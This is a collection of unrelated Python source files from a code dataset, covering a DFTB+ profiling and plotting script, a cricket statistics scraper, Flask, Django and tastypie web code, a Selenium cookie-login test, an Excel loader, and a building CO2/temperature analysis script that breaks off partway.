command = 'cp geom.out.xyz ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp geo.gen ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp gmon.out ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp md.out ' + Output_directory\n print(command)\n os.system(command)\n\n\ndef line_plot(x_axis, y_axis, method):\n x_axis = np.array(x_axis)\n # print(x_axis)\n x_axis = list(map(int, x_axis))\n # print(x_axis)\n y_axis = np.array(y_axis)\n # print(y_axis)\n y_axis = list(map(float, y_axis))\n # print(y_axis)\n y_axis = [x for _, x in sorted(zip(x_axis, y_axis))]\n # print(y_axis)\n x_axis.sort()\n # print(x_axis)\n if method == 'QR':\n plt.plot(x_axis, y_axis, color='blue')\n elif method == 'DC':\n plt.plot(x_axis, y_axis, color='red')\n elif method == 'RR':\n plt.plot(x_axis, y_axis, color='green')\n else:\n plt.plot(x_axis, y_axis, color='orange')\n\n\ndef draw_graph():\n dir_list = next(os.walk(Result_directory))[1]\n # print(dir_list)\n # print(len(dir_list))\n molecule = []\n method = []\n graph_filename = Result_directory + '/scalability_plot.png'\n for i in dir_list:\n words = i.split('_')\n molecule.append(words[0])\n 
method.append(words[1])\n molecule = list(set(molecule))\n method = list(set(method))\n for i in range(0, Iteration_count):\n for j in method:\n x_axis = []\n y_axis = []\n for k in molecule:\n folder_name = Result_directory + k + '_' + j + '_' + str(i+1)\n with open(folder_name + '/geom.out.xyz') as f:\n first_line = f.readline() # No. of atoms\n first_line = first_line.replace('\\n', '')\n first_line = first_line.replace(' ', '')\n x_axis.append(first_line)\n f = open(folder_name + '/ProfilingReport_' + k + '_' + str(i+1))\n lines = f.readlines()\n f.close()\n lines[5] = lines[5].replace('\\n', '')\n sent = lines[5].split(' ')\n sent = list(filter(None, sent))\n if len(sent) > 5:\n y_axis.append(sent[2]) # Time\n else:\n y_axis.append('0.00')\n # print(x_axis)\n # print(y_axis)\n line_plot(x_axis, y_axis, j)\n plt.grid()\n blue_patch = mpatches.Patch(color='blue', label='QR')\n red_patch = mpatches.Patch(color='red', label='DC')\n green_patch = mpatches.Patch(color='green', label='RR')\n orange_patch = mpatches.Patch(color='orange', label='MAGMA')\n plt.figlegend(handles=[blue_patch, red_patch, green_patch, orange_patch], loc='upper right', fontsize=9)\n plt.title('Scalability plot (scc=on, v19.1)', fontsize=20)\n plt.xlabel('#Atoms', fontsize=16)\n plt.ylabel('Time (in seconds)', fontsize=16)\n # plt.show()\n plt.savefig(graph_filename, bbox_inches='tight', dpi=100)\n plt.close()\n gc.collect()\n\n\ndef draw_average_graph():\n dir_list = next(os.walk(Result_directory))[1]\n # print(dir_list)\n # print(len(dir_list))\n molecule = []\n method = []\n graph_filename = Result_directory + '/scalability_plot_avg.png'\n for i in dir_list:\n words = i.split('_')\n molecule.append(words[0])\n method.append(words[1])\n molecule = list(set(molecule))\n method = list(set(method))\n for i in method:\n x_axis = []\n y_axis = []\n for j in molecule:\n count = 0\n for k in range(0, Iteration_count):\n folder_name = Result_directory + j + '_' + i + '_' + str(k+1)\n with open(folder_name + '/geom.out.xyz') as f:\n first_line = f.readline() # No. 
of atoms\n first_line = first_line.replace('\\n', '')\n first_line = first_line.replace(' ', '')\n f = open(folder_name + '/ProfilingReport_' + j + '_' + str(k+1))\n lines = f.readlines()\n f.close()\n lines[5] = lines[5].replace('\\n', '')\n sent = lines[5].split(' ')\n sent = list(filter(None, sent))\n if len(sent) > 5:\n count = count + float(sent[2]) # Sum up time to take average\n else:\n count = count + 0\n x_axis.append(first_line)\n y_axis.append(count/Iteration_count) # Average time\n line_plot(x_axis, y_axis, i)\n plt.grid()\n blue_patch = mpatches.Patch(color='blue', label='QR')\n red_patch = mpatches.Patch(color='red', label='DC')\n green_patch = mpatches.Patch(color='green', label='RR')\n orange_patch = mpatches.Patch(color='orange', label='MAGMA')\n plt.figlegend(handles=[blue_patch, red_patch, green_patch, orange_patch], loc='upper right', fontsize=9)\n plt.title('Scalability plot (scc=on, v19.1) [Avg]', fontsize=20)\n plt.xlabel('#Atoms', fontsize=16)\n plt.ylabel('Time (in seconds)', fontsize=16)\n # plt.show()\n plt.savefig(graph_filename, bbox_inches='tight', dpi=100)\n plt.close()\n gc.collect()\n\n\ndef main():\n fp_read = open(Input_list, \"r\")\n for ln in fp_read:\n ln = ln.replace('\\n', '')\n profile_dftb(ln) # Profile dftb+\n fp_read.close()\n # profile_dftb('Propane')\n # draw_graph() # Plot scalability graph\n # draw_average_graph() # Plot scalability graph by taking the average of the 10 cases\n\n\nmain()\n\n\n\n\n\n\n","sub_path":"Profile.py","file_name":"Profile.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"72297071","text":"#Training Set 1+Jan+2001 to 31+Dec+2013\n\n#http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=23;agemin1=20;ageval1=age;class=2;filter=advanced;orderby=runs;spanmax1=31+Dec+2016;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\n#http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=24;agemin1=21;ageval1=age;class=2;filter=advanced;orderby=runs;spanmax1=31+Dec+2016;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\n#http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=25;agemin1=22;ageval1=age;class=2;filter=advanced;orderby=runs;spanmax1=31+Dec+2016;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\n#http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=26;agemin1=23;ageval1=age;class=2;filter=advanced;orderby=runs;spanmax1=31+Dec+2016;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\nimport urllib\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport os\nimport re\nimport pickle\ndef make_soup(url):\n thepage = urllib.request.urlopen(url)\n soupdata = BeautifulSoup(thepage, \"html.parser\")\n print(\"Parsing...\")\n return soupdata\n#1 2 3 4 5 6 7 8 9 10 11 12 13 14 15\n#Player,Span,Mat,Inns,NO,Runs,HS,Ave,BF ,SR, 100,50, 0, 4s, 6s\ncsv=\"TrainingSet.csv\"\nfile = open(os.path.expanduser(csv),\"wb\")\nheader=\"Player,Span,Years,Inns,R/I,HS,Avg,SR,100/I,50,50/I,4,6,6+4/BF\"+\"\\n\"\nfile.write(bytes(header,encoding=\"ascii\",errors='ignore'))\nsubstr=\";spanmax1=31+Dec+2013;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\"; #1+Jan+2001 to 31+Dec+2013\nlisp=[\"http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=23;agemin1=20;ageval1=age;class=2;filter=advanced;orderby=runs;\",\n 
\"http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=24;agemin1=21;ageval1=age;class=2;filter=advanced;orderby=runs;\",\n \"http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=25;agemin1=22;ageval1=age;class=2;filter=advanced;orderby=runs;\",\n \"http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=26;agemin1=23;ageval1=age;class=2;filter=advanced;orderby=runs;\"];\npl_tab=[];\no=0;\nfor pgs in lisp:\n pg=1;o=o+1;\n for pg in range(1,10): #Page Iterations\n list_pl = make_soup(pgs+\"page=\"+str(pg)+substr);\n #print(pgs)\n tdata=list_pl.findAll(\"table\",{\"class\":\"engineTable\"})\n cdata=tdata[2] #main Table data\n ldata=cdata.findAll(\"tr\",{\"class\":\"data1\"})\n s=\"\\n\"\n print(\"** Data Parsed Page \"+str(pg)+\" Link \"+str(o)+\" **\")\n for record in ldata:\n kq=\"\";kq1=\"\";\n list1=record.findAll('td')\n pl=list1[0].text.replace('\\n','').replace('\\t','').replace('*','')\n kq=list1[1].text.replace('\\n','').replace('\\t','').replace('*','')\n x1=int(kq.split(\"-\")[0])\n x2=int(kq.split(\"-\")[1])\n sp=x2-x1+1\n kq1=list1[3].text.replace('\\n','').replace('\\t','').replace('*','')\n inn = int(kq1)\n if sp >= 3 and inn >= 10:\n pattern = re.compile(\"\\((.*?)\\)\")\n pl = re.sub(pattern, '', pl)\n if any(pl in s for s in pl_tab):\n continue\n else:\n pl_tab.append(pl);\n #print(pl)\n k=\"\";\n i=0;bnd=0;no=0;hun=0;fif=0;t=0;bf=0;fl=0;\n for data in record.findAll('td'):\n k=data.text.replace('\\n','').replace('\\t','').replace('*','') \n i=i+1;\n if i==1 : #1 Player\n k=k+\",\"\n elif i==2 : #2 Span,Years\n x1=int(k.split(\"-\")[0])\n x2=int(k.split(\"-\")[1])\n sp=x2-x1+1\n k=k+\",\"+str(sp)+\",\"\n elif i == 4: #3 Inns\n t=int(k)\n k=k+\",\"\n #elif i == 5: # No/I\n # no=int(k)/t\n # k=str(no)+\",\"\n elif i == 6: #4 R/I\n ty=int(k)/t\n k=str(ty)+\",\"\n elif i == 7: #5 HS\n k=k+\",\"\n elif i == 8: #6 Avg\n k=k+\",\"\n elif i == 9:\n bf=int(k)\n k=\"\"\n elif i == 10: #7 SR\n k=k+\",\"\n elif i == 11: #8 100/I\n hun=int(k)/t\n k=str(hun)+\",\"\n elif i == 12: #9 50/I\n fif=int(k)/t\n k=k+\",\"+str(fif)+\",\"\n elif i == 14:\n bnd=int(k)\n k=k+\",\"\n elif i == 15: \n bnd=bnd+int(k) #10 6+4/BF\n bnd=bnd/bf \n k=k+\",\"+str(bnd)\n else:\n k=\"\"\n file.write(bytes(k,encoding=\"ascii\",errors='ignore'))\n file.write(bytes(s,encoding=\"ascii\",errors='ignore'))\nprint(pl_tab)\nwith open('pltable','wb') as fp:\n pickle.dump(pl_tab,fp)\nprint(\"Imported to \"+csv+\"!\")\n\n\n\n\n\n\n","sub_path":"Scrapper/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"574177076","text":"# -----------------------\n# PART 1 - QUESTION 4\n# -----------------------\nimport time\nimport sklearn.metrics.pairwise as sk_kernel\nimport numpy as np\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# draw 20,000 random vectors with 20 dimensions\nnum_of_vectors = 20000\nn = 20\nvectors = np.random.rand(num_of_vectors, n)\n\n# calculating the gram matrix (M[i][j] = K(Xi, Xj))\nstart_time = time.time()\ngram_matrix = np.square(np.matmul(vectors, vectors.T) + 1)\nend_time = time.time()\nprint(\"Gram matrix with kernel function - Total time: %s seconds\" % (end_time - start_time))\n\n# mapping the vectors from the lower dimension (20) to the higher dimension (231)\nphi = PolynomialFeatures(degree=2)\nmapped_vectors = phi.fit_transform(vectors)\n\ncoef_list = []\ni = 0\nwhile i <= n:\n j = i\n while j <= n:\n if i == j:\n 
coef_list.append(1)\n        else:\n            coef_list.append(np.sqrt(2))\n        j += 1\n    i += 1\ncoef_vector = np.array(coef_list)\n\nmapped_vectors = np.multiply(mapped_vectors, coef_vector)\n\n# calculating the mapping matrix (M[i][j] = phi(x)phi(y))\nstart_time = time.time()\nphi_matrix = np.matmul(mapped_vectors, mapped_vectors.T)\nend_time = time.time()\nprint(\"Gram matrix with Phi function - Total time: %s seconds\" % (end_time - start_time))\n\n# comparing the matrices (print so the result of the check is visible)\nprint(np.allclose(gram_matrix, phi_matrix))\n\n","sub_path":"ex5/311361661_205387954/kernel_vs_phi.py","file_name":"kernel_vs_phi.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"140943892","text":"#!/usr/bin/env python\n# coding:utf-8\n\"\"\"\nSimple data traversal built on the xlrd module\n\ndef filter: filter condition, addressed by column index\n\"\"\"\nimport xlrd, sys\n\n\nclass loadExcel:\n    # iteration counter\n    iter = 0\n\n    # selected fields\n    indexes = []\n\n    # mapping from column field to index\n    colIndex = {}\n\n    # collection of filter functions\n    filter_dict = {}\n\n    # collection of fill (transform) functions\n    fills_dict = {}\n\n    def __init__(self, filename, sheet, start=0):\n        if isinstance(sheet, int):\n            self.data = xlrd.open_workbook(filename).sheet_by_index(sheet)\n        else:\n            self.data = xlrd.open_workbook(filename).sheet_by_name(sheet)\n        sys.setrecursionlimit(self.data.nrows)\n        # build the field-to-index mapping\n\n        if start >= 0:\n            for index, field in enumerate(self.data.row_values(start)):\n                self.colIndex.update({field: index})\n\n    def __fields(self, field):\n        \"\"\"\n        Field conversion.\n        1. If the field is a str, look up its index\n        2. If the field is an int, validate it as an index\n        :param field:\n        :return: int\n        \"\"\"\n        if isinstance(field, int) and field < len(self.colIndex):\n            index = field\n        else:\n            index = self.colIndex.get(field)\n            if index is None:\n                raise IndexError(\"Index does not exist: %s\" % field)\n        return index\n\n    def filter(self, field, function):\n        \"\"\"\n        Data filtering. The inner functions must return bool.\n        :param field:\n        :param function:\n        :return:\n        \"\"\"\n        index = self.__fields(field)\n\n        funcs = self.filter_dict.get(index)\n\n        if funcs is None:  # no entry yet\n            funcs = [function]\n        else:\n            funcs.append(function)\n        self.filter_dict[index] = funcs\n        return self\n\n    def filterWithFields(self, function, **fields):\n        pass\n\n    def fills(self, field, function: object):\n        \"\"\"\n        Fill (transform) data with a collection of inner functions\n        :param field:\n        :param function:\n        :return:\n        \"\"\"\n        index = self.__fields(field)\n        # bug fix: read from fills_dict here, not filter_dict\n        funcs = self.fills_dict.get(index)\n\n        if not funcs:  # no entry yet\n            funcs = [function]\n        else:\n            funcs.append(function)\n        self.fills_dict[index] = funcs\n        return self\n\n    def fields(self, fields: str):\n        \"\"\"\n        Select output fields\n        :param fields:\n        :return:\n        \"\"\"\n        for field in fields.split(\",\"):\n            self.indexes.append(\n                self.__fields(field)\n            )\n        return self\n\n    def getColIndex(self):\n        \"\"\"\n        Return the (filtered) header fields\n        :return:\n        \"\"\"\n        return [key for key in self.filterColIndex(list(self.colIndex.keys()))]\n\n    def filterColIndex(self, line):\n        if len(self.indexes) > 0:\n            line = list(filter(lambda item: line.index(item) in self.indexes, line))\n        return line\n\n    def __next__(self):\n        \"\"\"\n        Iterator\n        :return:\n        \"\"\"\n        # bug fix: test the bound before fetching, so the last row is not dropped\n        if self.iter >= self.data.nrows:\n            raise StopIteration\n        line = self.data.row(self.iter)\n        self.iter += 1  # class-level counter, shared across instances\n\n        # apply filters\n        for index in self.filter_dict:\n            funcs = self.filter_dict.get(index)\n            value = line[index]\n            for func in funcs:\n                if not func(value):\n                    return self.__next__()\n        # apply fill functions\n        for index in self.fills_dict:\n            funcs = self.fills_dict.get(index)\n            for func in funcs:\n                line[index] = func(line[index])\n\n        # apply field selection, if any\n        line = self.filterColIndex(line)\n\n        return line\n\n    def __iter__(self):\n        return self\n","sub_path":"utils/loads.py","file_name":"loads.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428019806","text":"import pytest_mock\nfrom unittest.mock import MagicMock\nimport src.marvelous.usecases.update_name as target_package\nfrom src.marvelous.usecases.update_name import *\n\n\ndef test_update_name_succeed(mocker: pytest_mock.MockerFixture):\n    discord_id = 0\n    name = \"fuga\"\n    user: MagicMock = mocker.Mock()\n    user.display_name = \"hoge\"\n    get_func: MagicMock = mocker.patch.object(target_package, \"get_user\", return_value=user)\n    update_func: MagicMock = mocker.patch.object(data_store.users, \"update\")\n\n    update_name(discord_id, name)\n\n    assert user.display_name == name\n    get_func.assert_called_once_with(discord_id)\n    update_func.assert_called_once_with(user)\n","sub_path":"app/tests/marvelous/usecases/test_update_name.py","file_name":"test_update_name.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"518706610","text":"from flask import Flask, render_template, g, session, redirect, url_for\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.markdown import Markdown\n\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.config.from_object('config')\n\ndb = SQLAlchemy(app)\n\nmarkdown = Markdown(app, extensions=['extra', 'nl2br', 'toc', 'codehilite'])\n\nfrom app.views import base\nfrom app.views import post\nfrom app.views import users\nfrom app.views import admin\nfrom app.views import files\nfrom app.views import gallery\n\nfrom app.models import User
\n\napp.register_blueprint(post.mod)\napp.register_blueprint(base.mod)\napp.register_blueprint(users.mod)\napp.register_blueprint(admin.mod)\napp.register_blueprint(files.mod)\napp.register_blueprint(gallery.mod)\n\n@app.before_request\ndef before_request():\n    try:\n        g.user = User.query.filter_by(username=session['username']).first()\n    except Exception:\n        g.user = None\n\n@app.errorhandler(404)\ndef not_found(e):\n    return render_template('404.html'), 404\n\ndef datetimeformat(dt, format='%Y-%m-%d %H:%M'):\n    if not dt: return None\n    return dt.strftime(format)\n\ndef datetimedelta(dt):\n    if not dt: return None\n    delta = datetime.now() - dt\n    if delta.seconds < 60: return 'just now'\n    if delta.seconds < 600: return 'a few minutes ago'\n    if delta.days < 1: return datetimeformat(dt, '%H:%M')\n    return datetimeformat(dt) \n\n@app.template_filter('timestamp')\ndef timestamp(dt):\n    return datetimedelta(dt)\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"550673490","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.mixins import UpdateModelMixin, DestroyModelMixin\n\nfrom .models import Product\nfrom .serializers import ProductSerializer\n\nfrom django.shortcuts import render\n\nclass ProductListView(\n    APIView, # Base view class provided by Django Rest Framework\n    UpdateModelMixin, # Mixin that lets APIView handle HTTP PUT requests\n    DestroyModelMixin, # Mixin that handles DELETE requests\n):\n\n    def get(self, request, id=None):\n        if id:\n            # If an id is passed in the GET request, return the single\n            # product item identified by that id\n            try:\n                # Check whether the product item the user\n                # requested actually exists\n                queryset = Product.objects.get(id=id)\n            except Product.DoesNotExist:\n                # If the item does not exist, return an error message\n                return Response( {'errors' : ' This product item does not exist'}, status=400)\n\n            # Serialize the product item from the Django queryset and\n            # transform the data into JSON format\n            read_serializer = ProductSerializer(queryset)\n\n        else:\n            # Request all product items from\n            # the database using Django's model ORM\n            queryset = Product.objects.all()\n\n            read_serializer = ProductSerializer(\n                queryset, many=True\n            )\n        \n        return Response(read_serializer.data)\n    \n    def post(self, request):\n        # Pass the JSON data from the POST request on for validation\n        create_serializer = ProductSerializer(data=request.data)\n        print(create_serializer)\n\n        # Check whether the data in the POST request passes the validation defined in the serializer\n        if create_serializer.is_valid():\n\n            # If the data the user sent is valid,\n            # create a new product in the database\n            product_item_object = create_serializer.save()\n\n            # Serialize (transform) the new product item\n            # from a Python object into JSON format\n            read_serializer = ProductSerializer(product_item_object)\n\n            ## Return the HTTP response with the data of the new product\n            return Response(read_serializer.data, status=201)\n\n        # If the submitted data is not valid, return a 400 code with an error message\n        return Response(create_serializer.errors, status=400)\n    \n    def put(self, request, id=None):\n        try:\n            # Check whether the product item the user wants to update exists\n            product_item = Product.objects.get(id=id)\n        except Product.DoesNotExist:\n            return Response({'errors': 'This product item does not exist'}, status=400)\n        \n\n        update_serializer = ProductSerializer(product_item, data=request.data)\n        # If the data to update is valid, proceed to save it to the database\n        if update_serializer.is_valid():\n            \n            # valid data, update the product item in the database\n            product_item_object = update_serializer.save()\n\n            # Serialize the product item from a Python object to JSON\n            read_serializer = ProductSerializer(product_item_object)\n\n            return Response(read_serializer.data, status=200)\n        \n        # If the data is not valid, return an error response\n        return Response(update_serializer.errors, status=400)\n    \n    def delete(self, request, id=None):\n        try:\n            # Check whether the product item the user wants to delete exists\n            product_item = Product.objects.get(id=id)\n        except Product.DoesNotExist:\n            # If the product item does not exist, return an error message\n            return Response({'errors': 'This product item does not exist.'}, status=400)\n        \n        # Delete the item from the database\n        product_item.delete()\n\n        # Return an HTTP response indicating the item was deleted successfully\n        return Response(status=204)\n\n\n\n\n","sub_path":"SoftGAC/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225999860","text":"# -*- coding: utf-8 -*-\n\n# Django imports\n\n# Third-party imports\nfrom tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS\nfrom tastypie.serializers import Serializer\nfrom tastypie import fields\n\n# Local imports\nfrom freesbid.core.query import normalize_query, get_query\nfrom .models import Localidad, Provincia, Departamento\n\n\nclass ProvinciaResource(ModelResource):\n\n\tclass Meta:\n\t\tqueryset = Provincia.objects.all()\n\t\tresource_name = 'provincia'\n\t\tserializer = Serializer(formats=['json'])\n\t\tfiltering = {\n\t\t\t'nombre' : ALL,\n\t\t\t'id': ALL,\n\t\t}\n\t\talways_return_data = True\n\n\nclass DepartamentoResource(ModelResource):\n\n\tclass Meta:\n\t\tqueryset = Departamento.objects.all()\n\t\tresource_name = 'departamento'\n\t\tserializer = Serializer(formats=['json'])\n\t\tfiltering = {\n\t\t\t'nombre' : ALL,\n\t\t}\n\t\talways_return_data = True\n\t\tlist_allowed_methods = ['get']\n\n\n\nclass LocalidadResource(ModelResource):\n\n\tprovincia = fields.ForeignKey(ProvinciaResource, 'provincia', full=True)\n\tdepartamento = fields.ForeignKey(DepartamentoResource, 'departamento')\n\n\tclass Meta:\n\t\tqueryset = Localidad.objects.all().select_related('provincia', 'departamento')\n\t\tresource_name = 'localidad'\n\t\tserializer = Serializer(formats=['json'])\n\t\tfiltering = {\n\t\t\t'provincia' : ALL_WITH_RELATIONS,\n\t\t\t'nombre' : ALL_WITH_RELATIONS,\n\t\t}\n\t\talways_return_data = True\n\t\tlimit = 0\n\t\tmax_limit = 0\n\t\tlist_allowed_methods = ['get']\n\n\n\tdef apply_filters(self, request, applicable_filters):\n\t\tbase_object_list = super(LocalidadResource, self).apply_filters(request, applicable_filters)\n\t\tquery = request.GET.get('q', None)\n\t\tif query:\n\t\t\tentry_query = get_query(query, ['nombre'])\n\t\t\tbase_object_list = base_object_list.filter(entry_query).distinct()\n\t\treturn base_object_list
base_object_list","sub_path":"localidades/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"59088808","text":"# encoding : utf-8 -*- \n# @author : william \n# @software : PyCharm \n# Time : 2021/7/13 16:20\nimport json\nfrom selenium import webdriver\n\n\nclass Testwechat():\n\n def setup_class(self):\n '''\n 复用已有浏览器\n 1.需要在chrome下打开cmd,运行“chrome --remote-debugging-port=9222”\n 2.执行以下代码:“chrome_args = webdriver.ChromeOptions()\n chrome_args.debugger_address = \"127.0.0.1:9222\"”\n 3.webdriver.Chrome需要加上参数options\n ps:不要打开多个chrome浏览器\n :return:\n '''\n chrome_args = webdriver.ChromeOptions()\n chrome_args.debugger_address = \"127.0.0.1:9222\"\n self.driver = webdriver.Chrome()\n\n # def teardown_class(self):\n # self.driver.quit()\n\n def test_Open(self):\n self.driver.get(\"https://work.weixin.qq.com/\")\n self.driver.maximize_window()\n\n # cookies登录\n def test_cookie(self):\n # 获取当前浏览器页面cookies\n # browser_cookies = self.driver.get_cookies()\n # # 以文件流形式将cookies写进文件中\n # with open(\"cookies.json\",\"w\") as f:\n # # 将cookies存到json文件\n # json.dump(browser_cookies,f)\n\n # 向浏览器具体的页面添加cookies\n self.driver.get(\"https://work.weixin.qq.com/\")\n # 以文件流形式读取json中的cookies\n with open(\"cookies.json\",\"r\") as f:\n # 读取cookies\n cookies = json.load(f)\n for cookie in cookies:\n self.driver.add_cookie(cookie)\n self.driver.get(\"https://work.weixin.qq.com/wework_admin/frame\")\n\n # 点击客户联系\n cus_contact = self.driver.find_element_by_id('menu_customer')\n cus_contact.click()\n\n\n\n\n\n\n\n\n\n","sub_path":"zwl_webauto_homework/homework01/test_customer.py","file_name":"test_customer.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"172065560","text":"from AutoFeedback.varchecks import check_value\nfrom AutoFeedback import plot_error_messages\nclass line:\n def __init__(self, xdata, ydata, linestyle=None, colour=None,label=None,marker=None):\n self.xdata = xdata\n self.ydata = ydata\n self.linestyle= linestyle\n self.colour= colour\n self.label= label\n self.marker= marker\n self.diagnosis = \"ok\"\n def get_xydata(self):\n return(self.xdata,self.ydata)\n def check_linedata(self,gline) :\n x,y=zip(*gline.get_xydata())\n goodx, goody = False, False\n if hasattr(self.xdata, \"check_value\") and callable(self.xdata.check_value) : goodx=self.xdata.check_value( x )\n else : goodx=check_value(x,self.xdata)\n if hasattr(self.ydata, \"check_value\") and callable(self.ydata.check_value) : goody=self.ydata.check_value( y )\n else : goody=check_value(y,self.ydata)\n if not goodx and not goody : self.diagnosis = \"badxy\"\n elif not goodx : self.diagnosis = \"badx\"\n elif not goody : self.diagnosis = \"bady\"\n return(goodx and goody)\n def generic_error(self,label,axis):\n return( f\"The {axis}-coordinates of the points in the data set {label} are incorrect\\n\"+\\\n (\"\"\"\n The instructions in the README file explain the specific values for the xoordinates of the points in your graph.\n Make sure you have read those instructions carefully and that you know what the coordinates of \n the points in your graph should be\"\"\"))\n def get_error(self,label) :\n if self.diagnosis == \"badxy\" :\n error_message = plot_error_messages.error_message.data(label)\n elif self.diagnosis == \"badx\" : \n if hasattr(self.xdata, \"get_error\") and callable(self.xdata.get_error) : error_message = 
self.xdata.get_error(\"x coordinates of the data series in the graph labelled \" + label)\n else : \n error_message = self.generic_error(label,\"x\")\n elif self.diagnosis == \"bady\" : \n if hasattr(self.ydata, \"get_error\") and callable(self.ydata.get_error) : error_message = self.ydata.get_error(\"y coordinates of the data series in the graph labelled \" + label)\n else : \n error_message = self.generic_error(label,\"y\")\n return error_message\n \n\n","sub_path":"AutoFeedback/plotclass.py","file_name":"plotclass.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"510945410","text":"import sqlalchemy\nimport pandas as pd\nimport sqlite3\nimport numpy as np\nfrom datetime import datetime\nimport datetime as dt\nimport sys\n\n# Copyright 2018 Building Energy Gateway. All rights reserved.\n\n# Add outside air column in order to compare against the co2 value when checking for sensor issues.....\n\n\nimport time\nfrom building_data_requests import get_bulk\nimport numbers\nimport csv\n\ntemp_min = 65\ntemp_units = \"deg F\"\nco2_units = \"ppm\"\nco2_max = 1200\ntemp_max = 75\n\nSERVER_PATH = '' # '/media/ea/Data/Students/jade/buildingEnergyApi/'\nPATH = 'my_file'\n\nengine = sqlalchemy.create_engine('sqlite:///' + SERVER_PATH + PATH)\nconn = sqlite3.connect(SERVER_PATH + PATH)\n\nstart_time = time.time()\n\n# TASK TWO BEGINS HERE: analysis of problem rooms at each interval\n\ndf = pd.read_sql(\"TempAndCO2LogFiltered\", engine)\n# Outside Air is gone by this point...\n#print(df.set_index(\"Room #\").loc[\"Outside Air AHU2 ZN-T\"])\n\n# version with input -- could evolve into an interactive front end. Automation will come\n# This is now deprecated: the week start is chosen at task_zero.\n# week_start_month = input(\"Month: (number 1-12)\")\n# week_start_day = input(\"Day: (number 1-31)\")\n# week_start_year = input(\"Year: \")\n\n# week_start = datetime.strptime(week_start_month + \" \" + week_start_day + \" \" + week_start_year + \" 10:30:02\", \"%m %d %Y %H:%M:%S\")\n# #print(week_start)\n\n# #print(df)\ndf_test_copy = df.set_index(\"Timestamp\")\ndf_test_copy[\"Timestamp\"] = pd.to_datetime(df_test_copy.index)\n# for i in range(0, len(df_test_copy.index)):\n# df_test_copy[\"New Column\"][i] = datetime.strptime(df_test_copy.index[i], \"%a %b %d %H:%M:%S %Y\")\n# #print(\"Still working...\")\ndf_test_copy = df_test_copy.set_index([\"Timestamp\", \"Room #\"])\n# #print(week_start)\n# #print(datetime(2020, 2, 14, 7, 0, 3))\n# #print(df_test_copy.index)\n# #print(df_test_copy)\n# #print(df_test_copy.loc[str(week_start)])\n# the above line works if you add in the desired room # or not - use .loc to get a row\n\n#mi_test = pd.DataFrame(np.array([[3, 2, 1], [4, 5, 5], [7, 48, 9]]), columns=[1, 3, 5])\n##print(mi_test)\n##print(mi_test.loc[0])\n#mi_test = mi_test.set_index([1, 3])\n##print(mi_test)\n\n# #print(mi_test[mi_test.index[0]])\n# #print(mi_test.loc[(1732, 222)])# produces a key error\n\n\n# Gets interval data about a certain datetime, and the optional room parameter is passed in\n# Not needed yet...\ndef get_interval_data(date_time, room=None):\n if room is None:\n print(df_test_copy.loc[str(date_time)]) # this works\n else:\n print(df_test_copy.loc[(str(date_time), str(room))]) # this also works -- the room data type is a STRING\n\n\n# get_interval_data(datetime(2020, 2, 14, 7, 0, 3)) # test function call 3/11 -- works perfectly!\n\n# Function defs from task II\ndef check_temp(x):\n 
